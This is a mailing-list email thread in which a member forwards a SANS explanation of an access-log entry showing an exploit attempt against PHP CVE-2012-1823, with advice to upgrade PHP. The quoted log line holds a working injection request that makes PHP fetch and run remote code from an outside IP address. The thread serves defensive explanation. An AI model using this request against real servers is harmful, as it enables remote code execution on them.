Good Explanantion Naik Ji, and i heard that u r in Hyderabad......
congrats ......... On Mon, May 28, 2012 at 1:15 PM, Srinivas Naik <[email protected]> wrote: > Hi G33Ks, > > > @ SANS > > FYI > > Bob detected in his webserver the following string in the access log of > his web server: > > bas1-richmondhill34-1177669777.dsl.bell.ca - - [24/May/2012:12:17:49 > -0700] "GET > /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt > HTTP/1.1" 404 2890 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; > .NET CLR 1.0.2914)" > > This string is an attempt to exploit the PHP vulnerability > CVE-2012-1823<http://www.cvedetails.com/cve/CVE-2012-1823> with > the remote execution variant. Let's see what means each of the options > invoked: > > - safe_mode=off: PHP disables the capacity of checking if the if the > owner of the current script matches the owner of the file to be operated by > a file funcionality. This directive has been deprecated on PHP 5.3.0 tree > and removed on PHP 5.4.0 tree. > - disable_functions=null: No function is disabled from the whole > amount contained within PHP. This means that insecure functions are > available like proc_open, exec, passthru, curl_exec, system, popen, > curl_multi_exec and shell_exec. For more information on this functions, > please check the PHP manual <http://php.net/manual/en/index.php>. > - allow_url_fopen=on: This directive allows PHP to open files located > in http or ftp locations and operate them as a normal file descriptor. > - allow_url_include=on:This directive allows to include additional PHP > code located in a http or ftp URL into the PHP file before being processed > and executed. > - auto_prepend_file=http://81.17.24.82/info3.php: This directive > includes the PHP code located in http://81.17.24.82/info3.php and > execute it before the code inside index.php. > > You can prevent this by using the latest stable PHP version located at the > downloads page. If you are using windows, please be careful because you can > be affected by the CVE-2012-2376<http://www.cvedetails.com/cve/CVE-2012-2376/> > . > > > Cheers, > > 0xN41K > > -- > You received this message because you are subscribed to the Google Groups > "nforceit" group. > To post to this group, send an email to [email protected]. > To unsubscribe from this group, send email to > [email protected]. > For more options, visit this group at > http://groups.google.com/group/nforceit?hl=en-GB. > -- Rakesh Nagekar 9701887568 -- You received this message because you are subscribed to the Google Groups "nforceit" group. To post to this group, send an email to [email protected]. To unsubscribe from this group, send email to [email protected]. For more options, visit this group at http://groups.google.com/group/nforceit?hl=en-GB.
